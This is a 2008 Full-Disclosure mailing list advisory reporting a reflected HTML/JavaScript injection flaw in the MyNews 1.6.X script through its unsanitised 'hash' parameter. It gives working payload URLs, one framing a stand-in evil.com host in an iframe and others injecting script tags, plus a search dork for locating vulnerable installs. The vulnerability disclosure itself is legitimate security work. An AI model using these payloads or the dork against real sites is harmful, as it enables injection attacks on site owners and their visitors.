[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <B3FCEB98-DA1C-402A-8D53-0BA5CDA8B1E9@gmx.net>
Date: Wed, 6 Feb 2008 20:06:13 +0100
From: SkyOut <skyout@....net>
To: full-disclosure@...ts.grok.org.uk
Subject: MyNews 1.6.X HTML/JS Injection Vulnerability
I know its basic, but I am a supporter of FD and therefore
planetluc.com has to be
blamed now! I checked their script MyNews in version 1.6.4 today and
then some
other versions, all are vulnerable to HTML and JS injection.
--- ADVISORY ---
----------------------------
|| WWW.SMASH-THE-STACK.NET ||
-----------------------------
|| ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability
_____________________
|| 0x00: ABOUT ME
|| 0x01: DATELINE
|| 0x02: INFORMATION
|| 0x03: EXPLOITATION
|| 0x04: GOOGLE DORK
|| 0x05: RISK LEVEL
____________________________________________________________
____________________________________________________________
_________________
|| 0x00: ABOUT ME
Author: SkyOut
Date: February 2008
Contact: skyout[-at-]smash-the-stack[-dot-]net
Website: http://www.smash-the-stack.net/
_________________
|| 0x01: DATELINE
2008-02-06: Bug found
2008-02-06: Advisory released
____________________
|| 0x02: INFORMATION
The MyNews script by planetluc.com in all versions of the 1.6.X tree is
vulnerable to HTML and JS injection due to no sanitation of the "hash"
value in combination with the action "admin".
_____________________
|| 0x03: EXPLOITATION
No exploit is needed to test this vulnerability. You just need a working
web browser.
1: HTML Injection
To make a HTML injectioni, visit the websites main page. The name
might differ
from the original name "mynews.inc.php", mostly its called
"index.php". Now
construct a malformed URL as follows:
http://www.example.com/index.php?hash="><iframe src=http://
www.evil.com/ height=500px width=500px></iframe><!--&do=admin
Of course you can manipulate the values of "height" and "width" like you
want to. Do it the way it best fits to your needs!
2: JavaScript Injection
JS injection is similar to HTML injection, just that you put a JS code
in the "hash" parameter. Let me show you two examples:
http://www.example.com/index.php?hash="><script>alert(1337);</
script><!--&do=admin
or
http://www.example.com/index.php?hash="><script>alert("XSS");</
script><!--&do=admin
Sometimes using strings doesn't work, so test it first!
____________________
|| 0x04: GOOGLE DORK
intext:"powered by MyNews 1.6.*"
___________________
|| 0x05: RISK LEVEL
- LOW - (1/3) -
<!> Happy Hacking <!>
____________________________________________________________
____________________________________________________________
THE END
--- ADVISORY ---
Sincerely,
SkyOut
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists